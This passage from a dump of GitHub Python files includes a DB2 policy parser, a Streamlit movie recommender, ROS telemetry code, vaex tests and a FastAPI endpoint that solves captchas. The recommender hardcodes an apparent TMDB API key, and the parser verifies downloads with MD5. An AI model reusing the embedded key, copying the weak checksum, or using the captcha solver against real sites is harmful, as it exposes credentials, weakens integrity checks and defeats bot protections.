xmlSchemaDoc = None\n return xmlSchemaDoc\n\n def parseFromText(self, xmlData, xmlSchemaDoc):\n \"\"\"\n Create an xml document from text input\n \"\"\"\n\n self.logger.debug('Parsing xml doc from text')\n xmlschema = etree.XMLSchema(xmlSchemaDoc)\n root = etree.fromstring(xmlData)\n errMsg = self.validate(xmlschema, root)\n if errMsg is not None:\n return errMsg\n self.parse(root)\n return None\n\n def parseFromFile(self, file, xmlSchemaDoc):\n \"\"\"\n Create an xml document from file input\n \"\"\"\n\n self.logger.debug('Parsing xml doc from file ' + file)\n xmlschema = etree.XMLSchema(xmlSchemaDoc)\n tree = etree.parse(file)\n root = tree.getroot()\n errMsg = self.validate(xmlschema, root)\n if errMsg is not None:\n return errMsg \n self.parse(root)\n return None\n\n def validate(self, xmlschema, root):\n \"\"\"\n Validate an xml document\n \"\"\"\n\n if not xmlschema(root):\n 
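# (editor's comment, added) lxml XMLSchema objects are callable\n            # validators: xmlschema(root) returns False on failure and keeps\n            # the details in xmlschema.error_log, inspected just below.\n            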
self.logger.error(xmlschema.error_log.last_error)\n errorMessage = xmlschema.error_log.last_error.message\n if errorMessage.startswith(\"Element '{{}}time'\".format(self.dpmNS)):\n return self.timeErrorManager(root, xmlschema)\n else:\n return str(xmlschema.error_log.last_error)\n else:\n return None\n\n def parseFromUrl(self, url, xmlSchemaDoc, conn,\n checksum_algo=None, checksum_value=None):\n \"\"\"\n Create an xml document from url input\n \"\"\"\n\n xmlData = conn.getDocumentByUrl(url)\n\n #Decide if checksum verification is needed and if yes, compute the checksum for the downloaded policy\n checksumVerificationNeeded = not checksum_algo == None\n checksumVerified = False\n if checksumVerificationNeeded:\n self.logger.debug('Checksum computation: '),\n checksumVerification = False\n if checksum_algo.lower() == 'md5':\n self.logger.debug('md5')\n newChecksumValue = hashlib.md5(xmlData.encode()).hexdigest()\n checksumVerified = newChecksumValue == checksum_value\n self.logger.debug('checksum computed %s read %s' % \\\n (newChecksumValue, checksum_value))\n\n #Parse the policy if checksum verification is needed\n self.logger.debug('Checksum verification: ')\n if checksumVerificationNeeded and checksumVerified:\n self.logger.debug('passed')\n return self.parseFromText(xmlData, xmlSchemaDoc)\n elif not checksumVerificationNeeded:\n self.logger.debug('disabled')\n return self.parseFromText(xmlData, xmlSchemaDoc)\n else:\n self.logger.error('failed')\n return 'Checksum verification: failed'\n\n\n def parse(self, policy):\n \"\"\"\n Parse the policy\n \"\"\"\n\n if policy == None or not policy.tag == self.dpmNS+'policy':\n self.logger.error('Failed to find policy element')\n else:\n self.policy = ReplicationPolicy(policy, self.dpmNS, self.loggerName,\n self.debug)\n self.policy.parse()\n\n def timeErrorManager(self, root, xmlschema):\n \"\"\"\n Manage the extra year field in the time element\n \"\"\"\n\n self.logger.debug('trying to fix year extra field in time element')\n timeElemList = root.xpath('//b:time',\n namespaces={'b':self.dpmNS})\n for timeElem in timeElemList:\n self.logger.debug('Element: ' + etree.tostring(timeElem))\n if len(timeElem.text.split()) < 6:\n self.logger.debug('Adding missing field year')\n timeElem.text = timeElem.text + ' *'\n if not xmlschema(root):\n self.logger.error(xmlschema.error_log.last_error)\n return str(xmlschema.error_log.last_error)\n else:\n self.logger.debug('Impossible to fix the error')\n return 'Element: ' + etree.tostring(timeElem) + ' is wrong'\n return None\n","repo_name":"EUDAT-B2SAFE/B2SAFE-DPM","sub_path":"client/cmd/PolicyParser.py","file_name":"PolicyParser.py","file_ext":"py","file_size_in_byte":5941,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72112588007","text":"# using streamlit to create a web app for movie recommendation system\n\nimport streamlit as st\nimport pandas as pd\nimport pickle\nimport requests\n\n# creating a function to fetch the poster path of the movie using the movie_id\n\ndef fetch_poster(movie_id):\n \n data = requests.get(\"https://api.themoviedb.org/3/movie/{}?api_key=6aa58baed4ff4058098e0d3f90d4112b&language=en-US\".format(movie_id))\n data = data.json()\n poster_path = data['poster_path']\n full_path = \"https://image.tmdb.org/t/p/w500/\" + poster_path\n return full_path\n\n# creating a function to recommend movies\ndef recommend(movie):\n # getting the index of the movie\n movie_index = movies_list[movies_list['title'] == movie].index[0]\n \n 
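# (editor's comment, added) similarity is assumed to be a precomputed\n    # NxN similarity matrix whose rows align with movies_list; it is\n    # unpickled from similarity.pkl further down in this script.\n    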
# getting the similarity scores of all movies with that movie\n # enumerate() is used to combine the index of the movie along with the similarity score\n similar_movies = list(enumerate(similarity[movie_index]))\n \n # sorting the list of similar movies in descending order\n sorted_similar_movies = sorted(similar_movies, key = lambda x:x[1], reverse = True)\n \n # getting the top 5 similar movies\n top_5_similar_movies = sorted_similar_movies[1:6]\n \n # creating recommended list\n recommended = []\n movie_id = []\n # printing the top 5 similar movies\n for i in range(len(top_5_similar_movies)):\n # fetching movie_id\n movie_id.append(movies_list['movie_id'][top_5_similar_movies[i][0]])\n recommended.append(movies_list['title'][top_5_similar_movies[i][0]])\n \n return recommended, movie_id\n\n\n# loading the similarity matrix\n\nsimilarity = pickle.load(open('similarity.pkl', 'rb'))\n\n# loading movies list from movies.pkl file\n\nmovies_list = pickle.load(open('movies.pkl', 'rb'))\n\n# accessing the title of movies\n\ntitles = movies_list['title'].values\n\n# creating a title for the web app\nst.title('Movie Recommendation System')\n\n# creating a selectbox to select a movie\noption = st.selectbox('Select a movie', titles)\n\n# adding button to select the movie\n\nif st.button('Recommend'):\n st.write('Top 5 Similar Movies')\n \n rcd, ids = recommend(option)\n # fetching the poster path of the movie_id in ids\n # and displaying the poster along with the movie title collected wise\n col1, col2, col3, col4, col5 = st.columns(5)\n \n with col1:\n st.text(rcd[0].title()) # converting the first letter of the movie to capital\n st.image(fetch_poster(int(ids[0]))) # converting the string to integer and passing it to the function to fetch the poster path\n \n with col2:\n st.text(rcd[1].title())\n st.image(fetch_poster(int(ids[1])))\n \n with col3:\n st.text(rcd[2].title())\n st.image(fetch_poster(int(ids[2])))\n \n with col4:\n st.text(rcd[3].title())\n st.image(fetch_poster(int(ids[3])))\n \n with col5:\n st.text(rcd[4].title())\n st.image(fetch_poster(int(ids[4])))","repo_name":"CoolGenius-123/Movies-Recomendation-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13884554681","text":"from __future__ import absolute_import\nfrom ctypes import c_void_p, create_string_buffer, addressof, cast, c_char, byref, c_char_p\n\nimport sys\nimport os\nimport platform\n\nfrom .cli_test_db2ApiDef import (POINTER_T)\nfrom . 
import db2_clu_constants\nfrom .cli_test_db2ApiDef import (sqlca)\nfrom utils.logconfig import mylog\nfrom sqlcodes import SQL_RC_OK\nfrom .db2_cli_constants import (SQL_NTS, SQL_HANDLE_STMT, SQL_HANDLE_DBC, SQL_COMMIT)\n\n__all__ = ['Common_Class']\n__docformat__ = 'reStructuredText en'\n\nclass Common_Class(object):\n \"\"\"common class to facilitate to all cli_test classes helper functions\n\n Attributes\n ----------\n mDb2_Cli : :class:`cli_object.Db2_Cli`\n hstmt : :class:`ctypes.c_void_p`\n \"\"\"\n\n def __init__(self, mDb2_Cli):\n self.mDb2_Cli = mDb2_Cli\n self.hstmt = c_void_p(None)\n\n def setParameterInt(self, index, token, in_int, flags=0):\n \"\"\"helper function to fill an integer parameter\n\n Parameters\n ----------\n index : :obj:`int`\n token : :class:`ctypes.c_uint32`\n in_int : :class:`ctypes.c_int`\n flags : :obj:`int`\n\n \"\"\"\n self.setParameter_int(self.cfgParameters[index], token, in_int, flags)\n\n def setParameter(self, cfgParameter, token, flags=0):\n \"\"\"helper function to fill an string parameter\n\n Parameters\n ----------\n\n cfgParameter : :class:`db2ApiDef.db2CfgParam`\n token : :class:`ctypes.c_uint32`\n flags : 0 or db2CfgParamAutomatic or db2CfgParamComputed or db2CfgParamManual\n \"\"\"\n cfgParameter.flags = flags\n cfgParameter.ptrvalue = create_string_buffer(255) #c_char * 65\n cfgParameter.token = token\n\n def setParameterString(self, cfgParameter, token, paramter_value):\n \"\"\"helper function to fill an string parameter to cfgParameter\n\n Parameters\n ----------\n\n cfgParameters : :class:`db2ApiDef.struct_db2CfgParam`\n token : :class:`ctypes.c_uint32`\n parameter_value : :obj:`str`\n \"\"\"\n cfgParameter.flags = 0\n cfgParameter.ptrvalue = create_string_buffer(paramter_value) #c_char * 65\n cfgParameter.token = token\n\n def encode_utf8(self, s):\n if s is None:\n return \"None\"\n\n if isinstance(s, int):\n return \"%d\" % s\n\n if isinstance(s, float):\n return \"%f\" % s\n\n if sys.version_info > (3,):\n #mylog.info(\"type %s\" % type(s))\n if isinstance(s, bytes):\n return s.decode('utf-8', 'ignore')\n else:\n return s.encode('utf-8', 'ignore')\n else:\n return s\n\n def InstanceAttach(self):\n \"\"\"helper function to attach db2 instance\"\"\"\n _sqlca = sqlca()\n rc = self.mDb2_Cli.libcli64.sqleatin_api(self.mDb2_Cli.nodeName,\n self.mDb2_Cli.user,\n self.mDb2_Cli.pswd,\n byref(_sqlca))\n if rc != SQL_RC_OK:\n mylog.error(\"InstanceAttach %s\" % _sqlca)\n self.get_sqlca_errormsg(_sqlca)\n\n elif _sqlca.sqlcode != SQL_RC_OK:\n mylog.error(\"InstanceAttach '%s'\" % _sqlca)\n self.get_sqlca_errormsg(_sqlca)\n\n else:\n mylog.debug(\"Attach SQL_RC_OK \")\n\n return rc\n\n def get_sqlstate_message(self, SQLSTATE):\n \"\"\"helper function to get a string error text from SQLSTATE number\n uses sqlogstt : Retrieves the message text associated with an SQLSTATE. \n \"\"\"\n # get SQLSTATE message\n psqlstateMsg = create_string_buffer(1024+1)\n rc = self.mDb2_Cli.libcli64.sqlogstt(byref(psqlstateMsg), 1024, 80, SQLSTATE)\n if (rc > 0):\n mylog.error(\"SQLSTATE errorMsg : '%s'\" % psqlstateMsg.value)\n else:\n mylog.warning(\"collecting SQLSTATE errorMsg returned an error rc = %d\" % rc)\n\n def get_sqlca_errormsg(self, _sqlca):\n \"\"\"helper function to get error message from sqlca\n uses sqlaintp : Retrieves the message associated with an error condition \n specified by the sqlcode field of the sqlca structure. 
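The formatted\n        text is returned through the caller-allocated buffer passed to\n        sqlaintp_api (editor's gloss, not part of the original docstring).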
\n\n Parameters\n ----------\n _sqlca : :class:`db2ApiDef.sqlca`\n \"\"\"\n # get error message\n perrorMsg = c_char_p(self.encode_utf8(\" \") * 1025)\n pMsgFileName = c_char_p(self.encode_utf8(\"db2sql.mo\"))\n\n rc = self.mDb2_Cli.libcli64.sqlaintp_api(perrorMsg, 1024, 80, pMsgFileName, byref(_sqlca))\n mylog.debug(\"rc = %d\" % rc)\n if rc > 0:#> number indicating the number of bytes in the formatted message\n sqlstate = self.encode_utf8(_sqlca.sqlstate).rstrip()\n mylog.debug(\"_sqlca.sqlstate '%s'\" % sqlstate)\n if sqlstate != '':\n mylog.error(\"\"\"\nerrorMsg : '%s'\nsqlca.sqlstate : '%s'\n\"\"\" % (\n self.encode_utf8(perrorMsg.value),\n sqlstate))\n self.get_sqlstate_message(_sqlca.sqlstate)\n else:\n mylog.error(\"\"\"\nerrorMsg : '%s'\n\"\"\" % self.encode_utf8(perrorMsg.value))\n\n def InstanceDetach(self):\n \"\"\"helper function to detach db2 instance\n uses sqledtin : Removes the logical instance attachment, and terminates the physical communication \n connection if there are no other logical connections using this layer.\n \"\"\"\n _sqlca = sqlca()\n rc = self.mDb2_Cli.libcli64.sqledtin_api(byref(_sqlca))\n if rc != SQL_RC_OK:\n mylog.error(\"InstanceDetach '%s'\" % _sqlca)\n self.get_sqlca_errormsg(_sqlca)\n else:\n mylog.debug(\"Detach SQL_RC_OK\")\n\n return rc\n\n def setParameter_int(self, cfgParameter, token, in_int, flags=0):\n \"\"\"helper function to fill an integer parameter\n\n Parameters\n ----------\n\n cfgParameters : :class:`db2ApiDef.db2CfgParam`\n token : :class:`ctypes.c_uint32`\n in_int : :class:`ctypes.c_int`\n\n \"\"\"\n cfgParameter.flags = flags\n cfgParameter.ptrvalue = cast(addressof(in_int), POINTER_T(c_char))\n cfgParameter.token = token\n\n def getDB2_USER(self):\n return self.mDb2_Cli.my_dict['DB2_USER'].upper()\n\n def getDB2_DATABASE(self):\n return self.mDb2_Cli.my_dict['DB2_DATABASE'].upper()\n\n def setDB2Version(self):\n \"\"\"set DB2 Version on some structures parameters, to tell DB2 \n that the structures passed were generated by version SQL_REL10100\n \"\"\"\n #if platform.system() == 'Darwin':\n # because db2ApiDef was generated using DB2 10.01 aka 10.1\n # I have to hard code ver SQL_REL10100 as the header file\n # of the structures generated are bound to DB2 10.1, it will crash on 11.1 if I specify 11.1 as the\n # struct I am passing dont match 11.1 specs\n #\n self.SQL_REL10100 = 10010000 \n self.db2Version = self.SQL_REL10100\n mylog.info(\"I am hardcoding the db2 version as SQL_REL10100\")\n\n def check_sqlca(self, _sqlca, func_name):\n if _sqlca.sqlcode != SQL_RC_OK:\n mylog.error(\"\"\"\nfunc_name '%s' \nsqlca %s\nsqlca.sqlcode '%s'\n\"\"\" % (func_name,\n _sqlca,\n self.getsqlcode(_sqlca.sqlcode)))\n self.get_sqlca_errormsg(_sqlca)\n else:\n mylog.debug(\"\"\"func_name %s SQL_RC_OK\"\"\" % func_name)\n\n def getsqlcode(self, sqlcode):\n \"\"\"helper function to return literal string of error sqlcode\n browse the file db2_clu_constants.py dict and if it finds a match with the error code sqlcode\n returns the string representing that error, like 0 is SQL_RC_OK, return string \"SQL_RC_OK\"\n\n Parameters\n ----------\n sqlcode : :obj:`int`\n\n Returns\n -------\n :obj:`str`\n\n \"\"\"\n for key in db2_clu_constants.__dict__:\n if db2_clu_constants.__dict__[key] == sqlcode:\n mylog.debug(\"key %s type %s\" % (key, type(key)))\n #return \"%s\" % self.encode_utf8(key)\n return \"%s\" % key\n return \"\"\n\n def __getattr__(self, name):\n \"\"\"helper function to check if instance self.mDb2_Cli has the attribute being accessed\n if 
it does then I use it. next I try the self instance, if not found error out. \n \"\"\"\n if hasattr(self.mDb2_Cli, name):\n return getattr(self.mDb2_Cli, name)\n if hasattr(self.mDb2_Cli.libcli64, name):\n return getattr(self.mDb2_Cli.libcli64, name)\n else:\n raise AttributeError(\"%s\\n or %s\\n doesnt have attribute %s\" % (self, self.mDb2_Cli, name))\n\n def check_udfsrv_present(self):\n\n mylog.info(\"DB2PATH '%s' \" % self.mDb2_Cli.my_dict['DB2PATH'])\n if platform.system() == \"Darwin\":\n udfsrv = \"udfsrv\"\n function = \"FUNCTION\"\n elif platform.system() == \"Windows\":\n udfsrv = \"udfsrv.dll\"\n function = \"FUNCTION\"\n else:\n udfsrv = \"udfsrv\"\n function = \"function\"\n udfsrv_path = os.path.join(self.mDb2_Cli.my_dict['DB2PATH'], function, udfsrv)\n\n if not os.path.exists(udfsrv_path):\n mylog.error(\"\\nudfsrv_path '%s' \\nfile not present we cant run udfcli functions\" % udfsrv_path)\n return -1\n return 0\n\n def check_spserver(self):\n if platform.system() == \"Darwin\":\n spserver = \"spserver\"\n function = \"FUNCTION\"\n elif platform.system() == \"Windows\":\n spserver = \"spserver.dll\"\n function = \"FUNCTION\"\n else:\n spserver = \"spserver\"\n function = \"function\"\n spserver_path = os.path.join(self.mDb2_Cli.my_dict['DB2PATH'], function, spserver)\n\n if not os.path.exists(spserver_path):\n mylog.error(\"\\nspserver_path '%s' \\nfile not present we cant run spserver functions\" % spserver_path)\n return -1\n return 0\n\n def run_statement(self, sql_str):\n\n #allocate the handle for statement 1 \n clirc = self.mDb2_Cli.libcli64.SQLAllocHandle(SQL_HANDLE_STMT,\n self.mDb2_Cli.hdbc,\n byref(self.hstmt))\n self.mDb2_Cli.STMT_HANDLE_CHECK(self.hstmt, self.mDb2_Cli.hdbc, clirc,\"SQL_HANDLE_STMT SQLAllocHandle\")\n str_list = sql_str.split(\"@\")\n\n for sql_1 in str_list:\n if sql_1.strip() == \"\":\n continue\n #if '--' in sql_1:\n # continue\n\n try:\n self.stmt = c_char_p(self.encode_utf8(sql_1))\n mylog.debug(\"\\n'%s'\\n\" % sql_1)\n \n cliRC = self.mDb2_Cli.libcli64.SQLExecDirect(self.hstmt, self.stmt, SQL_NTS)\n self.mDb2_Cli.STMT_HANDLE_CHECK(self.hstmt, self.mDb2_Cli.hdbc, cliRC,\"SQLExecDirect\")\n clirc = self.mDb2_Cli.libcli64.SQLEndTran(SQL_HANDLE_DBC, self.mDb2_Cli.hdbc, SQL_COMMIT)\n\n\n except Exception as i:\n if \"is an undefined name.\" in str(i):\n mylog.warning(\"executing %s\\nerror\\n%s\\n\" % (sql_1, str(i)))\n continue\n mylog.error(\"\\n%s\\n\" % sql_1)\n\n\n #clirc = self.mDb2_Cli.libcli64.SQLEndTran(SQL_HANDLE_DBC, self.mDb2_Cli.hdbc, SQL_COMMIT)\n # free the statement handle\n clirc = self.mDb2_Cli.libcli64.SQLFreeHandle(SQL_HANDLE_STMT, self.hstmt)\n self.mDb2_Cli.STMT_HANDLE_CHECK(self.hstmt, self.mDb2_Cli.hdbc, clirc,\"SQL_HANDLE_STMT SQLFreeHandle\")\n return 0","repo_name":"asierra01/ibm_db_test","sub_path":"cli_test_cases/cli_test_common_class.py","file_name":"cli_test_common_class.py","file_ext":"py","file_size_in_byte":11756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22982516665","text":"from typing import List\nfrom typing import Optional\n\nimport psutil\nimport rclpy.publisher\nimport std_msgs.msg\nfrom builtin_interfaces.msg import Time as TimeMsg\n\nfrom oasis_drivers.system.network_utils import NetworkUtils\nfrom oasis_drivers.system.system_types import Battery\nfrom oasis_drivers.system.system_types import DiskPartition\nfrom oasis_drivers.system.system_types import NetworkAddress\nfrom oasis_drivers.system.system_types import 
NetworkInterface\nfrom oasis_msgs.msg import DiskPartition as DiskPartitionMsg\nfrom oasis_msgs.msg import NetworkAddress as NetworkAddressMsg\nfrom oasis_msgs.msg import NetworkInterface as NetworkInterfaceMsg\nfrom oasis_msgs.msg import SystemTelemetry as SystemTelemetryMsg\n\n\nclass SystemMonitor:\n \"\"\"\n Utility class for interacting with psutil, the cross-platform library for\n retrieving process and system information.\n\n Reports the following data:\n\n - CPU percent\n - CPU frequency\n - CPU temperature\n - Memory utilization\n - Disk utilization\n - Network I/O\n\n Reports the following state:\n\n - CPU counts\n - CPU frequencies\n - Memory configuration\n - Disk configuration\n - Network addresses\n \"\"\"\n\n @classmethod\n def read_psutil(\n cls, telemetry_pub: rclpy.publisher.Publisher, timestamp: TimeMsg, frame_id: str\n ) -> None:\n # Read information from psutil\n bootstrap_time = float(psutil.boot_time())\n cpu_percent = float(psutil.cpu_percent())\n cpu_temperature = cls._read_cpu_temperature()\n cpu_frequency_ghz = cls._read_cpu_frequency_ghz()\n cpu_logical_core_count = int(psutil.cpu_count(logical=True))\n\n #\n # psutil.cpu_count() can return None on RPi because /proc/cpuinfo has a\n # different format and psutil doesn't want to play guessing games.\n #\n # See:\n #\n # https://github.com/giampaolo/psutil/issues/1078\n #\n try:\n cpu_physical_core_count = int(psutil.cpu_count(logical=False))\n except TypeError:\n cpu_physical_core_count = cpu_logical_core_count\n\n memory_percent = float(psutil.virtual_memory().percent)\n disk_partitions = cls._get_disk_partitions()\n network_interfaces = cls._get_network_interfaces()\n battery = cls._get_battery()\n\n # Timestamp in ROS header\n header = std_msgs.msg.Header()\n header.stamp = timestamp\n header.frame_id = frame_id\n\n # Create the message\n telemetry_msg = SystemTelemetryMsg()\n\n # Populate the message\n telemetry_msg.header = header\n telemetry_msg.bootstrap_time = bootstrap_time\n telemetry_msg.cpu_percent = cpu_percent\n if cpu_temperature is not None:\n telemetry_msg.cpu_temperature = cpu_temperature\n if cpu_frequency_ghz is not None:\n telemetry_msg.cpu_frequency_ghz = cpu_frequency_ghz\n telemetry_msg.cpu_physical_core_count = cpu_physical_core_count\n telemetry_msg.cpu_logical_core_count = cpu_logical_core_count\n telemetry_msg.memory_percent = memory_percent\n for partition in disk_partitions:\n disk_partition_msg = DiskPartitionMsg()\n disk_partition_msg.device_name = partition.device_name\n disk_partition_msg.filesystem = partition.filesystem\n disk_partition_msg.mount_point = partition.mount_point\n disk_partition_msg.mount_options = partition.mount_options\n disk_partition_msg.disk_total = partition.disk_total\n disk_partition_msg.disk_used = partition.disk_used\n disk_partition_msg.disk_free = partition.disk_free\n disk_partition_msg.disk_percent = partition.disk_percent\n telemetry_msg.disk_partitions.append(disk_partition_msg)\n for interface in network_interfaces:\n network_interface_msg = NetworkInterfaceMsg()\n network_interface_msg.name = interface.name\n network_interface_msg.provider = interface.provider\n network_interface_msg.bytes_sent = interface.bytes_sent\n network_interface_msg.bytes_received = interface.bytes_received\n for address in interface.addresses:\n network_address_msg = NetworkAddressMsg()\n network_address_msg.family = address.family\n network_address_msg.address = address.address\n network_address_msg.netmask = address.netmask\n 
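# one NetworkAddress message is built per address of the interface;\n # netmask was normalized to an empty string in _get_network_interfaces\n # for families that do not define one\n 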
network_interface_msg.addresses.append(network_address_msg)\n telemetry_msg.network_interfaces.append(network_interface_msg)\n if battery is not None:\n telemetry_msg.has_battery = True\n telemetry_msg.battery_percent = battery.battery_percent\n telemetry_msg.battery_remaining_mins = battery.battery_remaining_time\n telemetry_msg.power_plugged = battery.power_plugged\n else:\n telemetry_msg.has_battery = False\n\n # Publish the message\n telemetry_pub.publish(telemetry_msg)\n\n @staticmethod\n def _read_cpu_temperature() -> Optional[float]:\n for sensor, shwtemps in psutil.sensors_temperatures().items():\n # We only care about the core temperature for now\n if sensor != \"coretemp\":\n continue\n\n for shwtemp in shwtemps:\n label = str(shwtemp.label)\n temperature = float(shwtemp.current)\n\n # TODO\n if label == \"Package id 0\":\n return temperature\n\n return None\n\n @staticmethod\n def _read_cpu_frequency_ghz() -> Optional[float]:\n freq = psutil.cpu_freq()\n\n if freq:\n return float(freq.current) / 1000.0\n\n return None\n\n @staticmethod\n def _get_disk_partitions() -> List[DiskPartition]:\n disk_partitions = []\n\n for partition in psutil.disk_partitions():\n mount_point = str(partition.mountpoint)\n disk_usage = psutil.disk_usage(mount_point)\n\n # Skip snap mounts\n if mount_point.startswith(\"/snap\"):\n continue\n\n disk_partitions.append(\n DiskPartition(\n device_name=str(partition.device),\n filesystem=str(partition.fstype),\n mount_point=mount_point,\n mount_options=str(partition.opts),\n disk_total=int(disk_usage.total),\n disk_used=int(disk_usage.used),\n disk_free=int(disk_usage.free),\n disk_percent=float(disk_usage.percent),\n )\n )\n\n return disk_partitions\n\n @classmethod\n def _get_network_interfaces(cls) -> List[NetworkInterface]:\n net_io_counters = psutil.net_io_counters(pernic=True)\n net_addresses = psutil.net_if_addrs()\n\n interfaces = [\n NetworkInterface(\n name=interface,\n provider=cls._get_interface_provider(interface),\n bytes_sent=int(netio.bytes_sent),\n bytes_received=int(netio.bytes_recv),\n addresses=[\n NetworkAddress(\n family=NetworkUtils.get_network_address_family(snicaddr.family),\n address=str(snicaddr.address),\n netmask=str(snicaddr.netmask) if snicaddr.netmask else \"\",\n )\n for snicaddr in net_addresses[interface]\n ],\n )\n for interface, netio in net_io_counters.items()\n if interface != \"lo\"\n ]\n\n return interfaces\n\n @staticmethod\n def _get_interface_provider(interface_name: str) -> str:\n # TODO\n return \"\"\n\n @staticmethod\n def _get_battery() -> Optional[Battery]:\n battery = psutil.sensors_battery()\n\n if battery:\n return Battery(\n battery_percent=float(battery.percent),\n battery_remaining_time=float(battery.secsleft) / 60.0,\n power_plugged=bool(battery.power_plugged),\n )\n\n return None\n","repo_name":"eigendude/OASIS","sub_path":"oasis_drivers_py/oasis_drivers/system/system_monitor.py","file_name":"system_monitor.py","file_ext":"py","file_size_in_byte":8175,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"31312744568","text":"def getReplyMarkupCommand(command) :\n\n commands = [\"/about_feyorra\" , \"/about_feyorra@FeyorraBot\" , \"/locked_tokens\" , \"/locked_tokens@FeyorraBot\" , \"/latest\" , \"/latest@FeyorraBot\" , \"/liquidity_mining\" , \"/liquidity_mining@FeyorraBot\" ,\"/verify_stake\" , \"/verify_stake@FeyorraBot\" , \"/stake\" , \"/stake@FeyorraBot\" , \"/exchanges\" , \"/exchanges@FeyorraBot\" , \"/contract\" , 
\"/contract@FeyorraBot\" ]\n\n for i in range(0,16) :\n\n if commands[i] == command :\n\n return commands[i]\n\n return 0 \n","repo_name":"shadoowC1/Crypto-Assistant-Bot","sub_path":"getReplyMarkupCommand.py","file_name":"getReplyMarkupCommand.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17078832802","text":"import vaex\nimport pytest\n\n\nclass Foo(object):\n def __init__(self, df):\n self.df = df\n\n\nclass Spam(object):\n def __init__(self, df):\n self.df = df\n\n\nclass Egg(object):\n def __init__(self, spam):\n self.spam = spam\n self.df = spam.df\n\n\ndef test_accessor_basic():\n vaex._add_lazy_accessor('foo', lambda: Foo)\n df = vaex.example()\n assert isinstance(df.foo, Foo)\n assert df.foo is df.foo\n assert df.foo.df is df\n\n\ndef test_accessor_expression():\n vaex._add_lazy_accessor('foo', lambda: Foo, vaex.expression.Expression)\n df = vaex.example()\n assert isinstance(df.x.foo, Foo)\n assert df.x.foo is df.x.foo\n assert df.x.foo.df is df.x\n\ndef test_accessor_nested():\n df = vaex.example()\n vaex._add_lazy_accessor('spam.egg', lambda: Egg)\n with pytest.raises(expected_exception=AttributeError):\n a = df.spam\n vaex._add_lazy_accessor('spam.egg.foo', lambda: Foo)\n with pytest.raises(expected_exception=AttributeError):\n a = df.spam\n vaex._add_lazy_accessor('spam', lambda: Spam)\n assert df.spam is df.spam\n assert df.spam.df is df\n assert isinstance(df.spam, Spam)\n\n assert df.spam.egg is df.spam.egg\n assert df.spam.egg.spam is df.spam\n assert isinstance(df.spam.egg, Egg)\n\n assert df.spam.egg.foo is df.spam.egg.foo\n assert df.spam.egg.foo.df is df.spam.egg # abuse of foo\n assert isinstance(df.spam.egg.foo, Foo)\n","repo_name":"vaexio/vaex","sub_path":"tests/internal/accessor_test.py","file_name":"accessor_test.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"72458089767","text":"\"\"\"\"\nkl\n\"\"\"\nimport uvicorn\nfrom fastapi import FastAPI, UploadFile, File\n\nfrom src.captcha_cracker import CaptchaCracker\n\ncracker = CaptchaCracker()\napi = FastAPI()\n\n\n@api.post('/crack')\nasync def crack(file: UploadFile = File(...)):\n image_bytes = await file.read()\n return {\"captcha_solution\": cracker.crack(image_bytes=image_bytes)}\n\n\nif __name__ == '__main__':\n uvicorn.run(api, host='0.0.0.0', port=80)\n","repo_name":"nsaintgeours/captchacracker","sub_path":"model/src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71518885287","text":"#Start of minesweeper code\ndef minesweeper(n):\n arr = [[0 for row in range(n)] for column in range(n)]\n for row in arr:\n print(\" \".join(str(cell) for cell in row))\n print(\"\")\n\n\ngrid_size = input(\"Size of grid\")\n\nminesweeper(int(grid_size))\n\nimport random\n\nprint(\"Hello\")","repo_name":"Leonhest/git_practice","sub_path":"minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29310722897","text":"import os\nimport bz2\nimport _pickle as cPickle\nimport json\nfrom json import JSONEncoder\n\nimport numpy as np\n\n\nclass FileEncoder(JSONEncoder):\n def default(self, o):\n # if type(o) == np.ndarray:\n # return o.tolist()\n 
return o.__dict__\n\n\nclass File:\n\n def __init__(self, meta):\n self.save_dir = os.getcwd()\n self.meta = meta\n self.save_dir_was_changed = False\n\n def is_save_dir_default(self):\n return not self.save_dir_was_changed\n\n def set_save_dir(self, directory):\n self.save_dir = directory\n self.save_dir_was_changed = True\n\n def get_save_dir(self):\n if self.save_dir is None:\n return os.getcwd()\n return self.save_dir\n\n def file_exists(self, filename):\n return filename in self.get_filenames_in_folder()\n\n def get_filenames_in_folder(self):\n return os.listdir(self.get_save_dir())\n\n def get_filename(self, slice_num, location_num, record_num, extension, path=None):\n\n fn = self.pad_zero(slice_num) + '-' \\\n + self.pad_zero(location_num) + '-' \\\n + self.pad_zero(record_num) + extension\n if not fn.endswith(extension):\n fn = fn.split(\".\")[0] + extension\n if path is None or len(path) == 0:\n return fn\n return path + '\\\\' + fn\n\n @staticmethod\n def pad_zero(i, dst_len=2):\n s = str(i)\n if len(s) < dst_len:\n return '0' + s\n return s\n\n @staticmethod\n def retrieve_python_object_from_json(filename):\n try:\n f = open(filename)\n obj = json.load(f)\n if type(obj) == str:\n obj = json.loads(obj)\n f.close()\n return obj\n except Exception as e:\n print(\"could not load file:\", filename)\n print(e)\n\n @staticmethod\n def dump_python_object_to_json(filename, obj):\n with open(filename, 'w') as f:\n json.dump(obj, f, cls=FileEncoder)\n\n @staticmethod\n def retrieve_python_object_from_pickle(filename):\n try:\n data = bz2.BZ2File(filename, 'rb')\n return cPickle.load(data)\n except Exception as e:\n print(\"could not load file:\", filename)\n print(e)\n\n @staticmethod\n def dump_python_object_to_pickle(filename, obj):\n with bz2.BZ2File(filename, 'w') as f:\n cPickle.dump(obj, f)\n\n @staticmethod\n def strip_path(filename):\n return filename.split(\"/\")[-1].split(\"\\\\\")[-1]\n\n @staticmethod\n def decompose_filename(filename):\n parts = filename.split('.')\n if len(parts) != 2:\n return []\n filename, 